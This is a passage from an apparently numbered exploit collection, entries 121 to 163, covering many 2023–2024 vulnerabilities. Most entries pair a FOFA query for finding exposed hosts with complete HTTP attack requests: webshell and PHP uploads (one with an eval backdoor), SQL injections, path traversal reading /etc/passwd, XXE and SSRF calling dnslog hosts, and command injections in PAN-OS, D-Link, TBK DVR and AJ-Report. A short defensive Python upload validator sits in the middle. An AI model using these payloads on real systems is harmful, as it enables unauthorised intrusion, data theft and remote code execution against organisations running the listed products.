User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

The written file is then reachable at http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log straight into the admin console; system commands can be executed from there.
126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks (广联达) DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affects Adobe ColdFusion 2018u17 and earlier, 2021u7 and earlier, and 2023u1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 as a header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin console: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway (网康) index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway (网康) list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kelixun (科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= decodes to id)
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:10050
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog address>`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the server copy /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwei'er (天维尔) fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 1060
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Then request the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

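The uploads in entries 121, 124, 130, 133 and 155 above all succeed for the same reason: the server keeps the client-supplied filename (1.php, rce.php, test.php, or a path chosen through filePath=) and trusts the client's Content-Type (a PHP body labelled image/png), so the file lands under the web root with an executable extension. The validator below is an added example, not code from the original article or from any of those products; it shows the server-side checks that stop each of those payloads: an executable-extension check applied to every dot in the name (shell.php.png included), an allow-list of extensions, a declared-type check, a magic-byte check, a scan for script openers hidden inside otherwise valid image bytes, and a server-chosen storage name so the uploader never controls the path it can later request. The allow-list, the validate_upload() and stored_name() names and the sample payloads are assumptions constructed for the example.

```python
import re
import uuid

# Image types this endpoint is meant to accept, keyed to the bytes a genuine file
# starts with (constructed allow-list for the example; extend per endpoint).
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
EXPECTED_MIME = {"png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg", "gif": "image/gif"}
# Extensions the web server would execute. Matched anywhere a dot precedes them, so
# shell.php.png is rejected too (Apache-style multi-extension handling runs it).
EXECUTABLE_EXT = re.compile(r"\.(?:php\d?|phtml|phar|jsp|jspx|asp|aspx|ashx|cer|cgi)(?:\.|$)", re.I)
# Script openers that never belong inside an image, even after a valid header (polyglots).
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")


def validate_upload(filename, declared_mime, data):
    """Return (accepted, reason). No check relies on anything the client claims."""
    if not filename or "\x00" in filename or "/" in filename or "\\" in filename or ".." in filename:
        return False, "unsafe characters or path separators in filename"
    if EXECUTABLE_EXT.search(filename):
        return False, "executable extension present in filename"
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in MAGIC:
        return False, "extension not on allow-list"
    if declared_mime != EXPECTED_MIME[ext]:
        return False, "declared Content-Type does not match extension"
    if not any(data.startswith(signature) for signature in MAGIC[ext]):
        return False, "file header does not match extension"
    if any(marker in data.lower() for marker in SCRIPT_MARKERS):
        return False, "script marker embedded in file body"
    return True, "ok"


def stored_name(filename):
    """Server-chosen name: only the validated extension survives from the client's input."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return f"{uuid.uuid4().hex}.{ext}"


# Constructed samples modelled on the uploads in this page's entries.
SAMPLES = [
    ("1.php", "application/octet-stream", b"<?php phpinfo();?>"),            # entry 121
    ("1.php", "image/png", b"<?php phpinfo();@eval($_POST['sec']);?>"),     # entry 130
    ("test.php", "image/png", b"<?php phpinfo();unlink(__FILE__);?>"),      # entry 155
    ("kjldycpvjrm.jsp", "application/octet-stream", b"nyhelxrutzwhrsvsrafb"),  # entry 157
    ("logo.png", "image/png", b"\x89PNG\r\n\x1a\n" + bytes(16)),             # a genuine image
]

if __name__ == "__main__":
    for name, mime, body in SAMPLES:
        accepted, reason = validate_upload(name, mime, body)
        print(f"{name:18s} {accepted!s:5s} {reason}")
```

Order matters: the name and extension checks come first because they are cheap and reject the page's payloads outright, the header check then catches a PHP body renamed to .png, and the marker scan is the last line of defence against a real PNG with code appended. Storing under the uuid name also means that even if a later bug lets an attacker guess the upload directory, there is no client-chosen path such as /upload/2.php to request.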
156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) PACS WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
